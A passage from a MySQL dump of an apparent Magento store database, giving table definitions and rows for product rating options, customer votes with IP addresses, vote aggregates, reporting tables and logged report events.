  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Rating Option ID',
  `rating_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating ID',
  `code` varchar(32) NOT NULL COMMENT 'Rating Option Code',
  `value` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Option Value',
  `position` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Ration option position on Storefront'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating options';

--
-- Dumping data for table `rating_option`
--

INSERT INTO `rating_option` (`option_id`, `rating_id`, `code`, `value`, `position`) VALUES
(1, 1, '1', 1, 1),
(2, 1, '2', 2, 2),
(3, 1, '3', 3, 3),
(4, 1, '4', 4, 4),
(5, 1, '5', 5, 5),
(6, 2, '1', 1, 1),
(7, 2, '2', 2, 2),
(8, 2, '3', 3, 3),
(9, 2, '4', 4, 4),
(10, 2, '5', 5, 5),
(11, 3, '1', 1, 1),
(12, 3, '2', 2, 2),
(13, 3, '3', 3, 3),
(14, 3, '4', 4, 4),
(15, 3, '5', 5, 5),
(16, 4, '1', 1, 1),
(17, 4, '2', 2, 2),
(18, 4, '3', 3, 3),
(19, 4, '4', 4, 4),
(20, 4, '5', 5, 5);

-- --------------------------------------------------------

--
-- Table structure for table `rating_option_vote`
--

CREATE TABLE `rating_option_vote` (
  `vote_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Vote ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Vote option ID',
  `remote_ip` varchar(16) NOT NULL COMMENT 'Customer IP',
  `remote_ip_long` bigint(20) NOT NULL DEFAULT 0 COMMENT 'Customer IP converted to long integer format',
  `customer_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Customer ID',
  `entity_pk_value` bigint(20) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `rating_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating ID',
  `review_id` bigint(20) UNSIGNED DEFAULT NULL COMMENT 'Review ID',
  `percent` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Percent amount',
  `value` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Vote option value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating option values';

--
-- Dumping data for table `rating_option_vote`
--

INSERT INTO `rating_option_vote` (`vote_id`, `option_id`, `remote_ip`, `remote_ip_long`, `customer_id`, `entity_pk_value`, `rating_id`, `review_id`, `percent`, `value`) VALUES
(313, 16, '', 0, NULL, 2053, 4, 313, 20, 1),
(314, 18, '', 0, NULL, 2053, 4, 314, 60, 3),
(315, 20, '', 0, NULL, 2053, 4, 315, 100, 5),
(316, 20, '37.111.197.218', 37111, 10, 2063, 4, 316, 100, 5),
(317, 20, '103.220.207.22', 103220, NULL, 2064, 4, 317, 100, 5),
(318, 20, '103.87.214.219', 10387, NULL, 2063, 4, 318, 100, 5),
(319, 18, '103.87.214.219', 10387, NULL, 2063, 4, 319, 60, 3),
(320, 18, '118.179.43.20', 118179, NULL, 2064, 4, 320, 60, 3),
(321, 19, '118.179.43.20', 118179, NULL, 2064, 4, 321, 80, 4),
(322, 20, '203.76.99.202', 20376, 14, 2064, 4, 322, 100, 5),
(323, 16, '37.139.53.179', 37139, NULL, 2055, 4, 323, 20, 1),
(324, 16, '37.139.53.179', 37139, NULL, 2062, 4, 324, 20, 1),
(325, 16, '37.139.53.179', 37139, NULL, 2061, 4, 325, 20, 1),
(326, 16, '37.139.53.179', 37139, NULL, 2059, 4, 326, 20, 1),
(327, 16, '37.139.53.179', 37139, NULL, 2054, 4, 327, 20, 1),
(328, 16, '37.139.53.179', 37139, NULL, 2060, 4, 328, 20, 1),
(329, 16, '37.139.53.179', 37139, NULL, 2058, 4, 329, 20, 1),
(330, 16, '37.139.53.179', 37139, NULL, 2063, 4, 330, 20, 1),
(331, 16, '91.220.163.57', 91220, 75, 2054, 4, 331, 20, 1),
(332, 16, '91.220.163.57', 91220, 75, 2054, 4, 332, 20, 1),
(333, 16, '91.220.163.57', 91220, 75, 2054, 4, 333, 20, 1),
(334, 16, '91.220.163.57', 91220, 75, 2054, 4, 334, 20, 1),
(335, 16, '91.220.163.57', 91220, 75, 2054, 4, 335, 20, 1),
(336, 16, '91.220.163.57', 91220, 75, 2054, 4, 336, 20, 1),
(337, 16, '91.220.163.57', 91220, 75, 2054, 4, 337, 20, 1),
(338, 17, '91.220.163.57', 91220, 75, 2054, 4, 338, 40, 2),
(339, 17, '91.220.163.57', 91220, 75, 2054, 4, 339, 40, 2),
(340, 17, '91.220.163.57', 91220, 75, 2054, 4, 340, 40, 2),
(341, 16, '91.220.163.57', 91220, 75, 2054, 4, 341, 20, 1),
(342, 17, '91.220.163.57', 91220, 75, 2054, 4, 342, 40, 2),
(343, 17, '91.220.163.57', 91220, 75, 2054, 4, 343, 40, 2),
(344, 17, '91.220.163.57', 91220, 75, 2054, 4, 344, 40, 2),
(345, 17, '91.220.163.57', 91220, 75, 2054, 4, 345, 40, 2),
(346, 16, '91.220.163.57', 91220, 75, 2054, 4, 346, 20, 1),
(347, 17, '91.220.163.57', 91220, 75, 2054, 4, 347, 40, 2),
(348, 17, '91.220.163.57', 91220, 75, 2054, 4, 348, 40, 2),
(349, 16, '91.220.163.57', 91220, 75, 2054, 4, 349, 20, 1),
(350, 17, '91.220.163.57', 91220, 75, 2054, 4, 350, 40, 2),
(351, 16, '91.220.163.57', 91220, 75, 2054, 4, 351, 20, 1),
(352, 17, '91.220.163.57', 91220, 75, 2054, 4, 352, 40, 2),
(353, 16, '91.220.163.57', 91220, 75, 2054, 4, 353, 20, 1),
(354, 17, '91.220.163.57', 91220, 75, 2054, 4, 354, 40, 2),
(355, 16, '91.220.163.57', 91220, 75, 2054, 4, 355, 20, 1),
(356, 17, '91.220.163.57', 91220, 75, 2054, 4, 356, 40, 2),
(357, 16, '91.220.163.57', 91220, 75, 2054, 4, 357, 20, 1),
(358, 17, '91.220.163.57', 91220, 75, 2054, 4, 358, 40, 2),
(359, 16, '91.220.163.57', 91220, 75, 2054, 4, 359, 20, 1),
(360, 17, '91.220.163.57', 91220, 75, 2054, 4, 360, 40, 2),
(361, 16, '91.220.163.57', 91220, 75, 2054, 4, 361, 20, 1),
(362, 17, '91.220.163.57', 91220, 75, 2054, 4, 362, 40, 2),
(363, 16, '91.220.163.57', 91220, 75, 2054, 4, 363, 20, 1),
(364, 17, '91.220.163.57', 91220, 75, 2054, 4, 364, 40, 2),
(365, 16, '91.220.163.57', 91220, 75, 2054, 4, 365, 20, 1),
(366, 17, '91.220.163.57', 91220, 75, 2054, 4, 366, 40, 2),
(367, 16, '91.220.163.57', 91220, 75, 2054, 4, 367, 20, 1),
(368, 17, '91.220.163.57', 91220, 75, 2054, 4, 368, 40, 2),
(369, 16, '91.220.163.57', 91220, 75, 2054, 4, 369, 20, 1),
(370, 17, '91.220.163.57', 91220, 75, 2054, 4, 370, 40, 2),
(371, 16, '91.220.163.57', 91220, 75, 2054, 4, 371, 20, 1),
(372, 17, '91.220.163.57', 91220, 75, 2054, 4, 372, 40, 2),
(373, 16, '91.220.163.57', 91220, 75, 2054, 4, 373, 20, 1),
(374, 17, '91.220.163.57', 91220, 75, 2054, 4, 374, 40, 2),
(375, 16, '91.220.163.57', 91220, 75, 2054, 4, 375, 20, 1),
(376, 17, '91.220.163.57', 91220, 75, 2054, 4, 376, 40, 2),
(377, 16, '91.220.163.57', 91220, 75, 2054, 4, 377, 20, 1),
(378, 17, '91.220.163.57', 91220, 75, 2054, 4, 378, 40, 2),
(379, 16, '91.220.163.57', 91220, 75, 2054, 4, 379, 20, 1),
(380, 16, '91.220.163.57', 91220, 75, 2054, 4, 380, 20, 1),
(381, 17, '91.220.163.57', 91220, 75, 2054, 4, 381, 40, 2),
(382, 17, '91.220.163.57', 91220, 75, 2054, 4, 382, 40, 2),
(383, 16, '91.220.163.57', 91220, 75, 2054, 4, 383, 20, 1),
(384, 17, '91.220.163.57', 91220, 75, 2054, 4, 384, 40, 2),
(385, 17, '91.220.163.57', 91220, 75, 2054, 4, 385, 40, 2),
(386, 16, '91.220.163.57', 91220, 75, 2054, 4, 386, 20, 1),
(387, 17, '91.220.163.57', 91220, 75, 2054, 4, 387, 40, 2),
(388, 16, '91.220.163.57', 91220, 75, 2054, 4, 388, 20, 1),
(389, 17, '91.220.163.57', 91220, 75, 2054, 4, 389, 40, 2),
(390, 17, '91.220.163.57', 91220, 75, 2054, 4, 390, 40, 2),
(391, 17, '91.220.163.57', 91220, 75, 2054, 4, 391, 40, 2),
(392, 17, '91.220.163.57', 91220, 75, 2054, 4, 392, 40, 2),
(393, 17, '91.220.163.57', 91220, 75, 2054, 4, 393, 40, 2),
(394, 17, '91.220.163.57', 91220, 75, 2054, 4, 394, 40, 2),
(395, 17, '91.220.163.57', 91220, 75, 2054, 4, 395, 40, 2),
(396, 17, '91.220.163.57', 91220, 75, 2054, 4, 396, 40, 2),
(397, 17, '91.220.163.57', 91220, 75, 2054, 4, 397, 40, 2),
(398, 17, '91.220.163.57', 91220, 75, 2054, 4, 398, 40, 2),
(399, 17, '91.220.163.57', 91220, 75, 2054, 4, 399, 40, 2),
(400, 17, '91.220.163.57', 91220, 75, 2054, 4, 400, 40, 2),
(401, 17, '91.220.163.57', 91220, 75, 2054, 4, 401, 40, 2),
(402, 17, '91.220.163.57', 91220, 75, 2054, 4, 402, 40, 2),
(403, 17, '91.220.163.57', 91220, 75, 2054, 4, 403, 40, 2),
(404, 17, '91.220.163.57', 91220, 75, 2054, 4, 404, 40, 2),
(405, 17, '91.220.163.57', 91220, 75, 2054, 4, 405, 40, 2),
(406, 17, '91.220.163.57', 91220, 75, 2054, 4, 406, 40, 2),
(407, 17, '91.220.163.57', 91220, 75, 2054, 4, 407, 40, 2),
(408, 17, '91.220.163.57', 91220, 75, 2054, 4, 408, 40, 2),
(409, 16, '91.220.163.57', 91220, 75, 2054, 4, 409, 20, 1),
(410, 17, '91.220.163.57', 91220, 75, 2054, 4, 410, 40, 2),
(411, 16, '91.220.163.57', 91220, 75, 2054, 4, 411, 20, 1),
(412, 16, '91.220.163.57', 91220, 75, 2054, 4, 412, 20, 1),
(413, 17, '91.220.163.57', 91220, 75, 2054, 4, 413, 40, 2),
(414, 17, '91.220.163.57', 91220, 75, 2054, 4, 414, 40, 2),
(415, 16, '91.220.163.57', 91220, 75, 2054, 4, 415, 20, 1),
(416, 17, '91.220.163.57', 91220, 75, 2054, 4, 416, 40, 2),
(417, 16, '91.220.163.57', 91220, 75, 2054, 4, 417, 20, 1),
(418, 17, '91.220.163.57', 91220, 75, 2054, 4, 418, 40, 2),
(419, 16, '91.220.163.57', 91220, 75, 2054, 4, 419, 20, 1),
(420, 17, '91.220.163.57', 91220, 75, 2054, 4, 420, 40, 2),
(421, 17, '91.220.163.57', 91220, 75, 2054, 4, 421, 40, 2),
(422, 16, '91.220.163.57', 91220, 75, 2054, 4, 422, 20, 1),
(423, 16, '91.220.163.57', 91220, 75, 2054, 4, 423, 20, 1),
(424, 17, '91.220.163.57', 91220, 75, 2054, 4, 424, 40, 2),
(425, 16, '91.220.163.57', 91220, 75, 2054, 4, 425, 20, 1),
(426, 17, '91.220.163.57', 91220, 75, 2054, 4, 426, 40, 2),
(427, 16, '91.220.163.57', 91220, 75, 2054, 4, 427, 20, 1),
(428, 17, '91.220.163.57', 91220, 75, 2054, 4, 428, 40, 2),
(429, 16, '91.220.163.57', 91220, 75, 2054, 4, 429, 20, 1),
(430, 17, '91.220.163.57', 91220, 75, 2054, 4, 430, 40, 2),
(431, 17, '91.220.163.57', 91220, 75, 2054, 4, 431, 40, 2),
(432, 16, '91.220.163.57', 91220, 75, 2054, 4, 432, 20, 1),
(433, 17, '91.220.163.57', 91220, 75, 2054, 4, 433, 40, 2),
(434, 16, '91.220.163.57', 91220, 75, 2054, 4, 434, 20, 1),
(435, 17, '91.220.163.57', 91220, 75, 2054, 4, 435, 40, 2),
(436, 16, '91.220.163.57', 91220, 75, 2054, 4, 436, 20, 1),
(437, 17, '91.220.163.57', 91220, 75, 2054, 4, 437, 40, 2),
(438, 16, '91.220.163.57', 91220, 75, 2054, 4, 438, 20, 1),
(439, 17, '91.220.163.57', 91220, 75, 2054, 4, 439, 40, 2),
(440, 17, '91.220.163.57', 91220, 75, 2054, 4, 440, 40, 2),
(441, 17, '91.220.163.57', 91220, 75, 2054, 4, 441, 40, 2),
(442, 16, '91.220.163.57', 91220, 75, 2054, 4, 442, 20, 1),
(443, 17, '91.220.163.57', 91220, 75, 2054, 4, 443, 40, 2),
(444, 17, '91.220.163.57', 91220, 75, 2054, 4, 444, 40, 2),
(445, 16, '91.220.163.57', 91220, 75, 2054, 4, 445, 20, 1),
(446, 16, '91.220.163.57', 91220, 75, 2054, 4, 446, 20, 1),
(447, 17, '91.220.163.57', 91220, 75, 2054, 4, 447, 40, 2),
(448, 16, '91.220.163.57', 91220, 75, 2054, 4, 448, 20, 1),
(449, 16, '91.220.163.57', 91220, 75, 2054, 4, 449, 20, 1),
(450, 17, '91.220.163.57', 91220, 75, 2054, 4, 450, 40, 2),
(451, 17, '91.220.163.57', 91220, 75, 2054, 4, 451, 40, 2),
(452, 16, '91.220.163.57', 91220, 75, 2054, 4, 452, 20, 1),
(453, 17, '91.220.163.57', 91220, 75, 2054, 4, 453, 40, 2),
(454, 17, '91.220.163.57', 91220, 75, 2054, 4, 454, 40, 2),
(455, 17, '91.220.163.57', 91220, 75, 2054, 4, 455, 40, 2),
(456, 16, '91.220.163.57', 91220, 75, 2054, 4, 456, 20, 1),
(457, 17, '91.220.163.57', 91220, 75, 2054, 4, 457, 40, 2),
(458, 16, '91.220.163.57', 91220, NULL, 2060, 4, 739, 20, 1),
(459, 16, '91.220.163.57', 91220, NULL, 2060, 4, 740, 20, 1),
(460, 16, '91.220.163.57', 91220, NULL, 2060, 4, 741, 20, 1),
(461, 16, '91.220.163.57', 91220, NULL, 2060, 4, 742, 20, 1),
(462, 16, '91.220.163.57', 91220, NULL, 2060, 4, 743, 20, 1),
(463, 16, '91.220.163.57', 91220, NULL, 2060, 4, 744, 20, 1),
(464, 16, '91.220.163.57', 91220, NULL, 2060, 4, 745, 20, 1),
(465, 16, '91.220.163.57', 91220, NULL, 2060, 4, 746, 20, 1),
(466, 16, '91.220.163.57', 91220, NULL, 2060, 4, 747, 20, 1),
(467, 16, '91.220.163.57', 91220, NULL, 2060, 4, 748, 20, 1),
(468, 16, '91.220.163.57', 91220, NULL, 2060, 4, 749, 20, 1),
(469, 16, '91.220.163.57', 91220, NULL, 2060, 4, 750, 20, 1),
(470, 16, '91.220.163.57', 91220, NULL, 2060, 4, 751, 20, 1),
(471, 16, '91.220.163.57', 91220, NULL, 2060, 4, 752, 20, 1),
(472, 16, '91.220.163.57', 91220, NULL, 2060, 4, 753, 20, 1),
(473, 16, '91.220.163.57', 91220, NULL, 2060, 4, 754, 20, 1),
(474, 16, '91.220.163.57', 91220, NULL, 2060, 4, 755, 20, 1),
(475, 16, '91.220.163.57', 91220, NULL, 2060, 4, 756, 20, 1),
(476, 16, '91.220.163.57', 91220, NULL, 2060, 4, 757, 20, 1),
(477, 16, '91.220.163.57', 91220, NULL, 2060, 4, 758, 20, 1),
(478, 16, '91.220.163.57', 91220, NULL, 2060, 4, 759, 20, 1),
(479, 16, '91.220.163.57', 91220, NULL, 2060, 4, 760, 20, 1),
(480, 16, '91.220.163.57', 91220, NULL, 2060, 4, 761, 20, 1),
(481, 16, '91.220.163.57', 91220, NULL, 2060, 4, 762, 20, 1),
(482, 16, '91.220.163.57', 91220, NULL, 2060, 4, 763, 20, 1),
(483, 16, '91.220.163.57', 91220, NULL, 2060, 4, 764, 20, 1),
(484, 16, '91.220.163.57', 91220, NULL, 2060, 4, 765, 20, 1),
(485, 16, '91.220.163.57', 91220, NULL, 2060, 4, 766, 20, 1),
(486, 16, '91.220.163.57', 91220, NULL, 2060, 4, 767, 20, 1),
(487, 16, '91.220.163.57', 91220, NULL, 2060, 4, 768, 20, 1),
(488, 16, '91.220.163.57', 91220, NULL, 2060, 4, 769, 20, 1),
(489, 16, '91.220.163.57', 91220, NULL, 2060, 4, 770, 20, 1),
(490, 16, '91.220.163.57', 91220, NULL, 2060, 4, 771, 20, 1),
(491, 16, '91.220.163.57', 91220, NULL, 2060, 4, 772, 20, 1),
(492, 16, '91.220.163.57', 91220, NULL, 2060, 4, 773, 20, 1),
(493, 16, '91.220.163.57', 91220, NULL, 2060, 4, 774, 20, 1),
(494, 16, '91.220.163.57', 91220, NULL, 2060, 4, 775, 20, 1),
(495, 16, '91.220.163.57', 91220, NULL, 2060, 4, 776, 20, 1),
(496, 16, '91.220.163.57', 91220, NULL, 2060, 4, 777, 20, 1),
(497, 16, '91.220.163.57', 91220, NULL, 2060, 4, 778, 20, 1),
(498, 16, '91.220.163.57', 91220, NULL, 2060, 4, 779, 20, 1),
(499, 16, '91.220.163.57', 91220, NULL, 2060, 4, 780, 20, 1),
(500, 16, '91.220.163.57', 91220, NULL, 2060, 4, 781, 20, 1),
(501, 16, '91.220.163.57', 91220, NULL, 2060, 4, 782, 20, 1),
(502, 16, '91.220.163.57', 91220, NULL, 2060, 4, 783, 20, 1),
(503, 16, '91.220.163.57', 91220, NULL, 2060, 4, 784, 20, 1),
(504, 16, '91.220.163.57', 91220, NULL, 2060, 4, 785, 20, 1),
(505, 16, '91.220.163.57', 91220, NULL, 2060, 4, 786, 20, 1),
(506, 16, '91.220.163.57', 91220, NULL, 2060, 4, 787, 20, 1),
(507, 16, '91.220.163.57', 91220, NULL, 2060, 4, 788, 20, 1),
(508, 16, '91.220.163.57', 91220, NULL, 2060, 4, 789, 20, 1),
(509, 20, '185.225.28.230', 185225, NULL, 2061, 4, 1641, 100, 5),
(510, 20, '185.225.28.230', 185225, NULL, 2059, 4, 1642, 100, 5),
(511, 20, '185.225.28.230', 185225, NULL, 2058, 4, 1643, 100, 5),
(512, 16, '37.139.53.191', 37139, NULL, 2061, 4, 1644, 20, 1),
(513, 16, '37.139.53.191', 37139, NULL, 2061, 4, 1645, 20, 1);

-- --------------------------------------------------------

--
-- Table structure for table `rating_option_vote_aggregated`
--

CREATE TABLE `rating_option_vote_aggregated` (
  `primary_id` int(11) NOT NULL COMMENT 'Vote aggregation ID',
  `rating_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating ID',
  `entity_pk_value` bigint(20) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `vote_count` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Vote dty',
  `vote_value_sum` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'General vote sum',
  `percent` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Vote percent',
  `percent_approved` smallint(6) DEFAULT 0 COMMENT 'Vote percent approved by admin',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating vote aggregated';

--
-- Dumping data for table `rating_option_vote_aggregated`
--

INSERT INTO `rating_option_vote_aggregated` (`primary_id`, `rating_id`, `entity_pk_value`, `vote_count`, `vote_value_sum`, `percent`, `percent_approved`, `store_id`) VALUES
(227, 4, 2053, 3, 9, 60, 60, 0),
(228, 4, 2053, 3, 9, 60, 60, 1),
(229, 4, 2063, 4, 14, 70, 0, 0),
(230, 4, 2063, 4, 14, 70, 0, 1),
(231, 4, 2064, 4, 17, 85, 100, 0),
(232, 4, 2064, 4, 17, 85, 100, 1),
(233, 4, 2055, 1, 1, 20, 0, 0),
(234, 4, 2055, 1, 1, 20, 0, 1),
(235, 4, 2062, 1, 1, 20, 0, 0),
(236, 4, 2062, 1, 1, 20, 0, 1),
(237, 4, 2061, 4, 8, 40, 0, 0),
(238, 4, 2061, 4, 8, 40, 0, 1),
(239, 4, 2059, 2, 6, 60, 0, 0),
(240, 4, 2059, 2, 6, 60, 0, 1),
(241, 4, 2054, 128, 204, 32, 0, 0),
(242, 4, 2054, 128, 204, 32, 0, 1),
(243, 4, 2060, 52, 52, 20, 0, 0),
(244, 4, 2060, 52, 52, 20, 0, 1),
(245, 4, 2058, 2, 6, 60, 0, 0),
(246, 4, 2058, 2, 6, 60, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `rating_store`
--

CREATE TABLE `rating_store` (
  `rating_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating Store';

--
-- Dumping data for table `rating_store`
--

INSERT INTO `rating_store` (`rating_id`, `store_id`) VALUES
(4, 0),
(4, 1);

-- --------------------------------------------------------

--
-- Table structure for table `rating_title`
--

CREATE TABLE `rating_title` (
  `rating_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `value` varchar(255) NOT NULL COMMENT 'Rating Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating Title';

-- --------------------------------------------------------

--
-- Table structure for table `release_notification_viewer_log`
--

CREATE TABLE `release_notification_viewer_log` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Log ID',
  `viewer_id` int(10) UNSIGNED NOT NULL COMMENT 'Viewer admin user ID',
  `last_view_version` varchar(16) NOT NULL COMMENT 'Viewer last view on product version'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Release Notification Viewer Log Table';

-- --------------------------------------------------------

--
-- Table structure for table `reporting_counts`
--

CREATE TABLE `reporting_counts` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `type` varchar(255) DEFAULT NULL COMMENT 'Item Reported',
  `count` int(10) UNSIGNED DEFAULT NULL COMMENT 'Count Value',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reporting for all count related events generated via the cron job';

-- --------------------------------------------------------

--
-- Table structure for table `reporting_module_status`
--

CREATE TABLE `reporting_module_status` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Module ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Module Name',
  `active` varchar(255) DEFAULT NULL COMMENT 'Module Active Status',
  `setup_version` varchar(255) DEFAULT NULL COMMENT 'Module Version',
  `state` varchar(255) DEFAULT NULL COMMENT 'Module State',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Module Status Table';

-- --------------------------------------------------------

--
-- Table structure for table `reporting_orders`
--

CREATE TABLE `reporting_orders` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `total` decimal(20,4) UNSIGNED DEFAULT NULL,
  `total_base` decimal(20,4) UNSIGNED DEFAULT NULL,
  `item_count` int(10) UNSIGNED NOT NULL COMMENT 'Line Item Count',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reporting for all orders';

-- --------------------------------------------------------

--
-- Table structure for table `reporting_system_updates`
--

CREATE TABLE `reporting_system_updates` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `type` varchar(255) DEFAULT NULL COMMENT 'Update Type',
  `action` varchar(255) DEFAULT NULL COMMENT 'Action Performed',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reporting for system updates';

-- --------------------------------------------------------

--
-- Table structure for table `reporting_users`
--

CREATE TABLE `reporting_users` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `type` varchar(255) DEFAULT NULL COMMENT 'User Type',
  `action` varchar(255) DEFAULT NULL COMMENT 'Action Performed',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reporting for user actions';

-- --------------------------------------------------------

--
-- Table structure for table `report_compared_product_index`
--

CREATE TABLE `report_compared_product_index` (
  `index_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Index ID',
  `visitor_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Visitor ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `added_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Added At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reports Compared Product Index Table';

--
-- Dumping data for table `report_compared_product_index`
--

INSERT INTO `report_compared_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(1, 61, 6, 2062, 1, '2021-06-16 12:04:41'),
(2, 3043, NULL, 2058, NULL, '2025-03-25 11:33:11'),
(3, 3450, NULL, 2061, NULL, '2025-08-20 07:02:17');

-- --------------------------------------------------------

--
-- Table structure for table `report_event`
--

CREATE TABLE `report_event` (
  `event_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Event ID',
  `logged_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Logged At',
  `event_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Event Type ID',
  `object_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Object ID',
  `subject_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Subject ID',
  `subtype` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Subtype',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reports Event Table';

--
-- Dumping data for table `report_event`
--

INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(1, '2021-06-09 06:36:52', 1, 2063, 46, 1, 1),
(2, '2021-06-09 06:41:54', 1, 2064, 47, 1, 1),
(3, '2021-06-09 06:41:56', 1, 2061, 47, 1, 1),
(4, '2021-06-09 06:41:58', 1, 2058, 47, 1, 1),
(5, '2021-06-09 06:41:59', 1, 2055, 47, 1, 1),
(6, '2021-06-09 06:43:12', 4, 2064, 48, 1, 1),
(7, '2021-06-09 06:58:50', 1, 2063, 14, 0, 1),
(8, '2021-06-09 06:59:04', 1, 2064, 14, 0, 1),
(9, '2021-06-09 07:00:25', 1, 2063, 14, 0, 1),
(10, '2021-06-09 07:01:24', 1, 2064, 14, 0, 1),
(11, '2021-06-09 07:08:07', 1, 2061, 14, 0, 1),
(12, '2021-06-09 07:08:51', 1, 2061, 14, 0, 1),
(13, '2021-06-09 07:12:49', 1, 2064, 14, 0, 1),
(14, '2021-06-09 07:13:12', 1, 2064, 14, 0, 1),
(15, '2021-06-09 07:38:03', 1, 2063, 0, 1, 1),
(16, '2021-06-09 08:07:23', 1, 2064, 14, 0, 1),
(17, '2021-06-09 08:07:37', 1, 2064, 14, 0, 1),
(18, '2021-06-09 08:24:04', 1, 2064, 14, 0, 1),
(19, '2021-06-09 08:39:00', 1, 2063, 0, 1, 1),
(20, '2021-06-09 08:39:09', 4, 2063, 50, 1, 1),
(21, '2021-06-09 08:57:56', 1, 2063, 50, 1, 1),
(22, '2021-06-09 09:47:38', 1, 2064, 14, 0, 1),
(23, '2021-06-09 11:59:41', 4, 2064, 52, 1, 1),
(24, '2021-06-09 12:30:34', 1, 2054, 0, 1, 1),
(25, '2021-06-09 12:30:38', 1, 2055, 0, 1, 1),
(26, '2021-06-09 12:30:49', 1, 2064, 0, 1, 1),
(27, '2021-06-09 12:30:53', 1, 2063, 0, 1, 1),
(28, '2021-06-09 12:30:56', 1, 2062, 0, 1, 1),
(29, '2021-06-09 12:30:59', 1, 2060, 0, 1, 1),
(30, '2021-06-09 12:31:03', 1, 2059, 0, 1, 1),
(31, '2021-06-09 12:31:06', 1, 2061, 0, 1, 1),
(32, '2021-06-09 12:31:09', 1, 2058, 0, 1, 1),
(33, '2021-06-09 21:32:09', 1, 2060, 0, 1, 1),
(34, '2021-06-09 21:32:15', 1, 2063, 0, 1, 1),
(35, '2021-06-09 21:32:27', 1, 2058, 0, 1, 1),
(36, '2021-06-09 21:32:41', 1, 2055, 0, 1, 1),
(37, '2021-06-09 21:33:01', 1, 2061, 0, 1, 1),
(38, '2021-06-09 21:33:12', 1, 2062, 0, 1, 1),
(39, '2021-06-09 21:33:35', 1, 2054, 0, 1, 1),
(40, '2021-06-09 21:33:39', 1, 2059, 0, 1, 1),
(41, '2021-06-09 21:33:44', 1, 2064, 0, 1, 1),
(42, '2021-06-09 23:07:09', 1, 2053, 0, 1, 1),
(43, '2021-06-11 10:14:00', 1, 2053, 0, 1, 1),
(44, '2021-06-12 03:04:20', 1, 2064, 54, 1, 1),
(45, '2021-06-12 03:05:05', 1, 2064, 54, 1, 1),
(46, '2021-06-12 03:05:44', 1, 2064, 54, 1, 1),
(47, '2021-06-12 03:06:16', 1, 2064, 54, 1, 1),
